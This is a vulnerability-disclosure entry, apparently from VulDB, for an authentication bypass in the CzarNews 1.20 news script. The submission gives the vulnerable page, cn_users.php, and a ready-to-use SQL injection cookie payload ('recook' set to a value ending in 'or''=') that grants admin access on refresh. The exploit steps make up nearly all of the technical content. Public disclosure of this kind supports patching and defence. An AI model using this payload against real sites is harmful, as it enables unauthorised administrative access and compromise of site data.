| Title | CzarNews Script – Authentication Bypass |
|---|
| Description | Introduction
Exploit Title: CzarNews Script – Authentication Bypass
Version: 1.20
Date: 28.01.2017
Vendor Homepage: http://www.czaries.net
Software Download: http://www.czaries.net/scripts/czarnews.php
Exploit Author: Kaan KAMIS
Contact: iletisim[at]k2an[dot]com
Website: http://k2an.com
Category: Web Application Exploits
Overview
CzarNews is a news script that provides a powerful news manager for your website. It uses the fastest MySQL database system, which allows quick changes with posting and comments. Users are allowed unlimitedly under some conditions to access your own database. News can be posted easily and quickly, and it supports HTML and other formatting styles. A highly effective admin panel allows you to do everything on your website. A password retrieval system helps you when the password is forgotten. Installation takes less than a minute and requires PHP 4.x and a MySQL database.
Vulnerable URL:
http://locahost/czarnews/cn_users.php
Set new cookie:
Name : recook
Value : admin%2C'or''='
and refresh the page. |
|---|
| User | KAAN KAMIS (UID 213) |
|---|
| Submission | 29/01/2017 03:50 PM (9 years ago) |
|---|
| Moderation | 30/01/2017 03:49 PM (24 hours later) |
|---|
| Status | Accepted |
|---|
| VulDB Entry | 96259 [CzarNews Script 1.20 Cookie /czarnews/cn_users.php recook SQL Injection] |
|---|
| Points | 17 |
|---|